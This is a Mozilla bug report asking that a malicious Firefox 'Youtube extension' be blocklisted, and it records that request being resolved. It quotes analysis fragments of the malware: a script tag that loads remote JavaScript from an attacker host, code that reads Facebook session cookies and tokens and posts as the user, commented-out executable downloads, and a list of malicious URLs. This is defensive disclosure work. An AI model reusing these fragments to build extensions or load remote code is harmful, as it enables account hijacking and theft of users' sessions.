Closed
Bug 730399
Opened 12 years ago
Closed 12 years ago
Malicious "Youtube" extension
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Details
Attachments
(1 file)
|
1.55 MB,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Via loading this URL in a browser: http://hosting.muhammad-hasan[.]info/.fb.php?20560543 Wepawet analysis of the URL: http://wepawet.cs.ucsb.edu/view.php?hash=979b88bebb885ab1721297f33ee7e9cf&t=1330108668&type=js Actual results: Report for http://nemanjan00.com/odvale/youtube.xpi ** Embedded and Remote Files ** chrome.manifest update.rdf content/prefman.js content/skin/icon.png content/script-compiler.js content/youtube.js http://nemanjan00.com/odvale/fejs.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul install.rdf ** Embedded Metadata ** em:name="Youtube extension" em:version="1.0.3" em:creator="YOU" em:iconURL="chrome://youtube/content/skin/icon.png" em:description="Plays Youtube Videos Online, Quickly and Efficiently" em:homepageURL="http://ludnica.uk.to/" em:updateURL="http://ludnica.uk.to//update.rdf" em:updateKey="MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDTrfS3V3OMNjIemPFkdJji5dGxg+... <em:targetApplication RDF:resource="rdf:#$lSyBL"/> em:minVersion="2.0" em:maxVersion="10.*" /> ** Files Loaded ** ...overlay chrome://browser/content/browser.xul chrome://youtube/content/script-com... 'chrome://youtube/content/youtube.js' ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... em:iconURL="chrome://youtube/content/skin/icon.png" ** Remote Javascript Loaded ** ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul <RDF:Description RDF:about="rdf:#$ZMugE2" </RDF:Description> <RDF:Description RDF:about="rdf:#$0NugE2" <RDF:Description RDF:about="urn:mozilla:extension:youtube@youtube.com" </RDF:Description> var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { loadScript_you(); function loadScript_you() { var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://nemanjan00.com/odvale/fejs.js"); //setTimeout('javascript:location.reload(true);', 10000) // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... <RDF:Description RDF:about="urn:mozilla:install-manifest" em:description="Plays Youtube Videos Online, Quickly and Efficiently" </RDF:Description> <RDF:Description RDF:about="rdf:#$lSyBL" ** Facebook Paths Accessed ** ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook\.com/i)) { ** Facebook Cookies Accessed ** var fb_dtsg = Env.fb_dtsg; if (document['getElementsByName']('fb_dtsg')[0] == null) return false; fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; if (document['getElementsByName']('fb_dtsg')[0] == null) return false; fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** <RDF:RDF xmlns:NS1="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> NS1:updateLink="http://ludnica.uk.to/youtube.xpi" // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ blogs[0] = 'http://hummerh2-razlupan.web44.net/?'; blogs[1] = 'http://hosting.muhammad-hasan.info/.fb.php?'; blogs[2] = 'http://kandangwebsite.com/1/.fb.php?'; blogs[3] = 'http://tienda.soydesantarosa.com/.fb.php?'; blogs[4] = 'http://www.odvale.tk/odvale.php?'; blogs[5] = 'http://odvale.us.to/?'; blogs[6] = 'http://nemanjan00.binhoster.com/?'; ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; //window.location = "http://dl.dropbox.com/u/55258798/AntiSpam.exe"; ... '<center><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loa... //setTimeout('top.location=\'http://adf.ly/5b0tf\';', 10000) ...//setTimeout('top.location=\'http://dl.dropbox.com/u/55258798/Server/Downloader.... s.setAttribute("src", "http://nemanjan00.com/odvale/fejs.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul</code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/... ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... <RDF:RDF xmlns:em="http://www.mozilla.org/2004/em-rdf#" xmlns:NC="http://home.netscape.com/NC-rdf#" xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> em:homepageURL="http://ludnica.uk.to/" em:updateURL="http://ludnica.uk.to//update.rdf" Expected results: It should not steal your Facebook cookies and post to Facebook as you with out your consent or knowledge. This add-on is being served in conjunction with a Java exploit (see wepawet analysis above).
|
Assignee | |
Comment 1•12 years ago
|
||
Id: youtube@2youtube.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
|
|
Assignee | |
Comment 2•12 years ago
|
||
https://addons.mozilla.org/en-US/firefox/blocked/i71
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
|
||
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•